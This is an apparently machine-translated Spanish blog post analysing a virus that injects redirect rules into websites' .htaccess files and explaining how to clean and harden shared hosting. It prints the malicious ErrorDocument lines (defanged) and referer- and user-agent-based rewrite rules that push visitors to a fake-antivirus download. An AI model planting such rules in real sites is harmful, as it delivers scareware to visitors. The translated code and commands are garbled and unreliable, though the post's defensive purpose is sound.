Malware / virus - .htaccess "reescribir" y redirigir

Una nueva forma de virus que yo no veo sé mucho afectar a los sitios alojados en servicios inseguros donde los usuarios / cuentas subcuentas pueden "ver" entre sí. En concreto, todas las cuentas de alojamiento se ponen en la carpeta "vhosts"Y el derecho de la escritura carpeta de usuario los "vhosts" se le da a un usuario general ... revendedor en la mayoría de las situaciones. Es un método que no utiliza los servidores Web típica WHM / cPanel.

Htaccess acción Virus -.. Hack htaccess

Virus afecta a los archivos .htaccess el sitio víctima. Las líneas se añaden / Directivas a redirigir los visitantes (Viniendo de yahoo, msn, google, facebook, yaindex, twitter, myspace, etc sitios y portales de alto tráfico) a algunos sitios web que ofrecen "antivirus. "Es falso antivirus, Sobre la que escribí en la introducción de .

Esto es lo que se ve como una .htaccess afectadas: (no tener acceso a las direcciones URL de contenido por debajo de las líneas de)

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3

RewriteEngine On

RewriteCond% {HTTP_REFERER}. * Yandex. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Odnoklassniki. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Vkontakte. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Rambler. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Tube. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Wikipedia. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Blogger. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Baidu. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Qq.com. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Myspace. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Twitter *. $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Facebook *. $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Google *. $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Live. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Aol. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Bing. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Msn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Amazon. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Ebay. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LinkedIn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Flickr. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LiveJasmin. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Soso. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * DoubleClick. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Pornhub. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Orkut. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LiveJournal. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Wordpress. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Yahoo. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Pregunte. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Excite. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Altavista. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Msn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Netscape. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Hotbot. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Goto. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Infoseek. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Mamma. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Alltheweb. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Lycos. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Buscar *. $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * MetaCrawler. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Correo. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Dogpile. * $ [NC]

RewriteCond% {HTTP_USER_AGENT}. * Windows *.
RewriteRule. * [R, L]

RewriteCond% {} REQUEST_FILENAME! -f
RewriteCond% {} REQUEST_FILENAME! -d
RewriteCond% {} * REQUEST_FILENAME Jpg $ |!. *. Gif $ | *. Png $
RewriteCond% {HTTP_USER_AGENT}. * Windows *.
RewriteRule. * [R, L]

Aquellos que usan WordPress se encuentran estas líneas en el archivo .htaccess de public_html. Además, el virus crea un archivo. Htaccess en la misma carpeta wp-content.

*También hay situaciones en las que aparece en lugar peoriavascularsurgery.com dns.thesoulfoodcafe.com u otras direcciones.

Lo que hace este virus.

Una vez redirigido, el visitante es recibido con los brazos abiertos por el mensaje:

¡Advertencia!
El equipo contiene varios signos de virus y programas maliciosos Presencia. Su sistema anti-virus Requiere verificación inmediata!
Sistema de Seguridad llevará a cabo un análisis rápido y libre de su PC en busca de virus y programas maliciosos.

1 de malware

No importa que se pulsa el botón, se nos lleva a la página "mi PC"Creado para imitar XP diseño. Esto inicia automáticamente la "exploración" al final de la cual nos encontramos con que "infectados".

2 de malware

Después de hacer clic en Aceptar o Cancelar, se iniciará descargarFile setup.exe. Esta setup.exe es falso anti-virus afectar el sistema. Instale algunos de malware para propagar otros enlaces comprometidos, y además de estos un anti-virus software (Todos falsa) de que la víctima se le invita a comprar.
Los que se han puesto en contacto con el virus puede utilizar este formulario . También se recomienda para escanear el disco duro entero. Recomendar Kaspersky Internet Security o Kaspersky Anti-Virus.

Este tipo de virus afecta a los visitantes los sistemas operativos OS Windows XP, Windows ME, 2000 Windows, Windows NT, Windows 98 y Windows 95. Hasta la fecha no se conoce ningún caso de infección de los sistemas operativos Windows Vista y 7 Windows.

¿Cómo se puede eliminar el archivo de virus. Htaccess en el servidor y cómo prevenir la infección.

1. Analizar los archivos sospechosos y los códigos de borrado. Para asegurarse de que el archivo no sólo se verá afectada .htaccess usted debe analizar todos los archivos . Php si . Js.

2. Vuelva a escribir el archivo. Htaccess y establecer el chmod 644 o 744 con acceso de escritura sólo propietario del usuario.

3. Al crear una cuenta de alojamiento de una página web en la carpeta / home o / Webroot Esto creará automáticamente una carpeta que tiene a menudo el nombre del usuario (usuario para cpanel, ftpEtc.). Para evitar que los datos de escritura y los virus de transmisión de un usuario a otro, se recomienda que cada carpeta de usuario que se establece:

chmod 644 o 744, 755 - que se muestra es 644.
chown-R nume_folder nume_user.
chgrp-R nume_user nume_folder

ls-all maneras de comprobar si se hicieron correctamente. Debería aparecer algo como esto:

drwx-x-x 12 Dinamics Dinamics mayo 4096 6 14: 51 Dinamics /
drwx-x-x 10 4096 marzo 7 07 Duran Duran: Duran 46 /
drwx-x-x 12 tubos tubos 4096 ene 29 11: 23 tubos /
drwxr-xr-x 14 4096 febrero 26 2009 Express Express Express /
drwxr-xr-x 9 EZO EZO 4096 mayo 19 01: 09 EZO /
drwx-x-x 9 farmacéutica Pharma 4096 diciembre 19 22: 29 farmacéutica /

Si uno de los anteriores se userele FTP Los archivos infectadosNo se puede enviar el virus a otro host del usuario. Es una medida mínima de seguridad para proteger las cuentas alojadas en un servidor web.

Los elementos comunes de las zonas afectadas por este virus.

Todas las zonas afectadas redirigir los visitantes a los sitios por nombre de dominio que contienen "/".

Este "virus. htaccess"Afectar cualquier CMS (Joomla, WordPress, phpBBEtc) utilizando .htaccess.

. Htaccess Redirect Virus & Hack.

Malware / virus - .htaccess "reescribir" y redirigir

Sobre el Autor

stealth LP

Fundador y editor Opciones de invisibilidadEn fecha 2006.
La experiencia en los sistemas operativos Linux (especialmente CentOS), Mac OS X, Windows XP> Windows 10 y WordPress (CMS).

Deja un comentario

Este sitio usa Akismet para reducir el correo no deseado. Descubra cómo se procesan los datos de sus comentarios.